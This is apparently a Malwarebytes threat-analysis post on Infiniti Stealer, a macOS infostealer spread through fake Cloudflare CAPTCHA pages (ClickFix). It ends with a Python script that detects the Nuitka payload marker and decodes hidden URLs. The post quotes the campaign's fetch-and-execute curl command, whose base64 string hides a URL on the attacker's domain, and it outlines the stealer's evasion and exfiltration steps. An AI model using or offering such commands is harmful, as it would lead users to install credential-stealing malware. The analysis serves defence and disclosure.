Infiniti Stealer: a new macOS infostealer using ClickFix and Python/Nuitka | Malwarebytes

A previously undocumented macOS infostealer has surfaced during our routine threat hunting. We initially tracked it as NukeChain, but shortly before publication the malware's operator panel became publicly visible, revealing its real name: Infiniti Stealer.

This malware is designed to steal sensitive data from Macs. It spreads through a fake CAPTCHA page that tricks users into running a command themselves, a technique known as ClickFix. Instead of exploiting a bug, it relies on social engineering.

The final payload is written in Python and compiled with Nuitka, producing a native macOS binary. That makes it harder to analyze and detect than typical Python-based malware.

To our knowledge, this is the first documented macOS campaign combining ClickFix delivery with a Nuitka-compiled Python stealer.

ClickFix doesn't rely on software vulnerabilities. Instead, it relies on convincing the user to run a command themselves.

A fake verification page instructs the visitor to open Terminal, paste a command, and press Return. Once executed, the infection process begins immediately. The technique gained popularity on Windows systems, but it's now being adapted for macOS, with the instructions tailored to the platform (Command+Space, open Terminal, paste the command). Because the user runs the command directly, many traditional defenses are bypassed: there's no exploit, no malicious attachment, and no drive-by download.

The infection begins at update-check[.]com, which serves a convincing replica of a Cloudflare human verification page.

The page instructs the user to paste a "verification" command into Terminal. The extracted text preserved only its pieces (bash, curl -sSfL, echo, a base64 string and base64 --decode); the shell syntax below is reconstructed and the original quoting may differ:

    bash -c "$(curl -sSfL "$(echo aHR0cHM6Ly91cGRhdGUtY2hlY2suY29tL20vN2Q4ZGYyN2Q5NWQ5 | base64 --decode)")"

Once decoded, the string resolves to a URL hosted on the same domain that returns the first-stage dropper script.

The first payload is a Bash script using a template previously observed in macOS stealers such as MacSync (also referenced as SHub in earlier research). This suggests the use of a shared builder. Its responsibilities are straightforward.

The dropped binary is an Apple Silicon Mach-O executable (8.6 MB) compiled using Nuitka's onefile mode. Its header contains the signature

    4b 41 59 28 b5 2f fd

This corresponds to a "KAY" header followed by a zstd-compressed archive, used by Nuitka to package Python applications.

Unlike PyInstaller, Nuitka compiles Python source into C and produces a native binary, increasing the complexity of static analysis.

At runtime the loader decompresses roughly 35 MB of embedded data and launches the final payload.

The final payload, UpdateHelper.bin, is a Python 3.11 stealer compiled with Nuitka.

Despite compilation, the binary exposes thousands of named symbols, allowing its module structure to be reconstructed during analysis.

The stealer targets a wide range of sensitive data.

Data is exfiltrated using HTTP POST requests.

Before beginning data collection, the malware checks whether it is running inside known analysis environments.

It also introduces a randomized execution delay to evade automated analysis systems. When exfiltration completes, a function named uploadcomplete sends a Telegram notification to the operator and queues captured credentials for server-side password cracking.

The perception that macOS is a low-risk malware target continues to fade.

Infiniti Stealer shows how techniques that worked on Windows, like ClickFix, are now being adapted to target Mac users.

It also uses newer techniques, like compiling Python into native apps, which makes the malware harder to detect and analyze. If this approach proves effective, we may see more attacks like this.

If you followed instructions like this or pasted commands into Terminal from a website, take action right away.

Remember: do not paste commands into Terminal from websites. No legitimate CAPTCHA requires this.

With thanks to Marcelo Rivero for the binary analysis.
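Two defender-side checks drawn from the analysis above, as an added example that is not Malwarebytes' code: locating the "KAY" + zstd marker that identifies a Nuitka onefile payload inside a Mach-O image, and decoding the base64 token in a pasted ClickFix one-liner to reveal the URL it hides. The sample binary and command are constructed here (example.invalid is a placeholder, not the campaign's infrastructure), and the marker bytes are taken from the article.

```python
import base64
import re
from typing import Optional

# Marker described in the article: the ASCII bytes "KAY" immediately followed
# by the zstd frame magic 28 b5 2f fd that starts Nuitka's packed payload.
NUITKA_KAY_MAGIC = bytes.fromhex("4b4159" "28b52ffd")
MACHO_MAGIC_64 = bytes.fromhex("cffaedfe")  # MH_MAGIC_64 as stored on disk (LE)

def find_nuitka_payload(data: bytes) -> Optional[dict]:
    """Locate the Nuitka onefile marker in a binary image.

    Returns None when the marker is absent, otherwise the marker offset,
    whether the file starts like a 64-bit Mach-O, and how many bytes follow
    the "KAY" prefix (an estimate of the compressed payload size).
    """
    idx = data.find(NUITKA_KAY_MAGIC)
    if idx < 0:
        return None
    zstd_start = idx + 3  # skip "KAY"; the zstd frame begins here
    return {
        "offset": idx,
        "is_macho64": data[:4] == MACHO_MAGIC_64,
        "compressed_bytes": len(data) - zstd_start,
    }

# Base64 runs long enough to hide a URL; short flags like -sSfL never match.
_B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

def reveal_clickfix_urls(command: str) -> list:
    """Decode base64 tokens in a pasted one-liner and return any URLs inside."""
    urls = []
    for token in _B64_TOKEN.findall(command):
        try:
            decoded = base64.b64decode(token, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not base64, or not text: ignore the token
        if decoded.startswith(("http://", "https://")):
            urls.append(decoded)
    return urls

# Constructed samples (not real artifacts): a fake Mach-O with the marker at
# offset 68, and a ClickFix-style one-liner hiding https://example.invalid/stage1.
SAMPLE_BINARY = MACHO_MAGIC_64 + b"\x00" * 64 + NUITKA_KAY_MAGIC + b"\x00" * 32
SAMPLE_COMMAND = 'bash -c "$(curl -sSfL "$(echo aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvc3RhZ2Ux | base64 --decode)")"'

if __name__ == "__main__":
    print(find_nuitka_payload(SAMPLE_BINARY))
    print(reveal_clickfix_urls(SAMPLE_COMMAND))
```

Run find_nuitka_payload over a suspect file's bytes to triage it before a full unpack; reveal_clickfix_urls works on shell history or a clipboard capture without executing anything.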
Stefan Dasic
Passionate about antivirus solutions, Stefan has been involved in malware testing and AV product QA from an early age. As part of the Malwarebytes team, Stefan is dedicated to protecting customers and ensuring their security.